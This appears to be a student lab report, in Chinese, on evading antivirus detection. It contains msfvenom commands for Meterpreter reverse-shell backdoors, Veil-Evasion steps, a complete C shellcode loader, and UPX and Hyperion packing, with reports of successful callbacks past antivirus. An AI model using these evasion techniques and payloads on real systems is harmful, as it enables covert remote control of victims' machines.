基础问题回答
(1)杀软是如何检测出恶意代码的?
-
基于特征码的检测:特征码就是一段数据。如果一个可执行文件(或其他运行的库、脚本等)包含特定的数据则被认为是恶意代码。AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。
-
启发式恶意软件检测:根据些片面特征去推断;通过检测程序的行为是否属于恶意代码的行为来检测。
(2)免杀是做什么?
想方设法让自己的后门程序避免被杀毒软件检测到,实现此程序的功能
(3)免杀的基本方法有哪些?
改变特征码:加壳,shellcode等手段
改变行为:反弹连接,隧道传输等等
实验内容
实验一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
任务一:使用msf编码器生成各种后门程序及检测
1.正确使用msf编码器,生成exe文件
首先对实验二生成的backdoor后门程序放到网站VirusTotal或Virscan进行检测
后门程序很容易被发现识别
再使用msf编码器对后门程序进行一次和多次的编码,再进行检测
一次编码使用命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b 'x00' LHOST=192.168.1.154 LPORT=5337 -f exe > 20165337_backdoor.exe
一次编码后效果不大,依旧容易被发现
使用十次编码
十次编码使用命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘x00’ LHOST=192.168.1.154 LPORT=5303 -f exe > yy_backdoor.exe
编码十次也没有区别,因为编码总需要解码,杀软只需要把解码的程序代码编入检测库中就可以查杀这一类程序,除非使用新的编码模式。还有msfvenom生成backdoor的模板是固定的,只有用新的模板也许可以不被发现。
2.利用msfvenom生成jar文件
生成java后门程序的命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5303 x> yy1_backdoor_java.jar
先生成jar文件,再放入网页扫描
一个软件引擎还是有很多能发现是木马程序,但另一个引擎能发现的就少多了,说明java后门程序还是有效的。
3.msfvenom生成php文件
生成php后门程序的命令如下:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5337 x> yy2_backdoor.php
生成php文件后放入网页进行检测
能发现是后门程序的杀软已经相当少了
任务二:使用veil-evasion生成后门程序及检测
安装指令:sudo apt-get install veil-evasion
安装完毕后先输入veil
然后输入use evasion
进入Evil-Evasion
再输入use c/meterpreter/rev_tcp.py
进入配置界面
然后设置反弹连接IP set LHOST 192.168.1.154
在设置一下端口,set LPORT 5337
设置完成如下图
输入generate
生成文件,接着输入生成的程序名字veil_c_5337
放入网页检测
发现并没有什么变化,依然能被很容易的检测出来
任务三:半手工注入Shellcode并执行
使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5337 -f c
这是用C语言生成一段shellcode
再放入codeblocks里加上头文件编译运行一下
#include<stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char buf[] =
"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"
"x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
"xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52"
"x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1"
"x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b"
"x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03"
"x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b"
"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24"
"x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb"
"x8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4c"
"x77x26x07x89xe8xffxd0xb8x90x01x00x00x29xc4x54"
"x50x68x29x80x6bx00xffxd5x6ax0ax68xc0xa8x01x9a"
"x68x02x00x14xd9x89xe6x50x50x50x50x40x50x40x50"
"x68xeax0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5"
"x74x61xffxd5x85xc0x74x0axffx4ex08x75xecxe8x67"
"x00x00x00x6ax00x6ax04x56x57x68x02xd9xc8x5fxff"
"xd5x83xf8x00x7ex36x8bx36x6ax40x68x00x10x00x00"
"x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6ax00x56"
"x53x57x68x02xd9xc8x5fxffxd5x83xf8x00x7dx28x58"
"x68x00x40x00x00x6ax00x50x68x0bx2fx0fx30xffxd5"
"x57x68x75x6ex4dx61xffxd5x5ex5exffx0cx24x0fx85"
"x70xffxffxffxe9x9bxffxffxffx01xc3x29xc6x75xc1"
"xc3xbbxf0xb5xa2x56x6ax00x53xffxd5";
int main()
{
int (*func)() = (int(*)())buf;
func();
}
然后居然在开了金山毒霸的情况下完美运行了,听说别人都会被自己的杀软检测出来,感觉自己要换个杀软了
实验二:通过组合应用各种技术实现恶意代码免杀
任务一:半手工制作shellcode加压缩壳
首先使用压缩壳可以减少应用体积,如ASPack,UPX
把之前的liuyudong.exe放到kali中使用命令upx liuyudong.exe -o yybc_upxed.exe
加一个压缩壳
然后拿金山毒霸检测一下,果不其然没有任何问题
然后在杀软开着的情况下运行,运行成功并且能取得权限
放入网页检测还是能被轻易发现
任务二:加密壳
使用加密壳版权保护,反跟踪。如ASProtect,Armadillo
将上一个文件拷贝到/usr/share/windows-binaries/hyperion/
中
进入目录并输入命令wine hyperion.exe -v yy_upxed.exe yy_upxed_Hyperion.exe
成功后如下
用杀毒软件检查一下发现没有问题
尝试回连并发现可以成功
实验三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
同学使用的是金山毒霸
程序与软件管家共存
成功回连结果
实验中遇到的问题
最最难受的问题是我的kali的网有毒,桥接模式不能联网,需要先换成别的再改为桥接才能好,不知道原理,只知道这样能解决
使用杀软一定能防止病毒吗?
不一定,但是杀软能过滤绝大多数病毒,还是有效果的
实验心得
本次实验了解了免杀原理,也亲手制作了能避免被自己的杀软查杀的后门程序,之后和同学交流了很久过后,发现360和腾讯查杀力度一般,但是几次运行后门之后还是有效果;金山毒霸就很low,不能发现任何后门程序,唯一作用就是忽悠我设置金山毒霸的浏览器首页;最最牛逼的是Windows Defencer,所有实验使用的后门程序全都能被检测到,力度极大,恐怖如斯,以后还是换个靠谱的杀软比较好。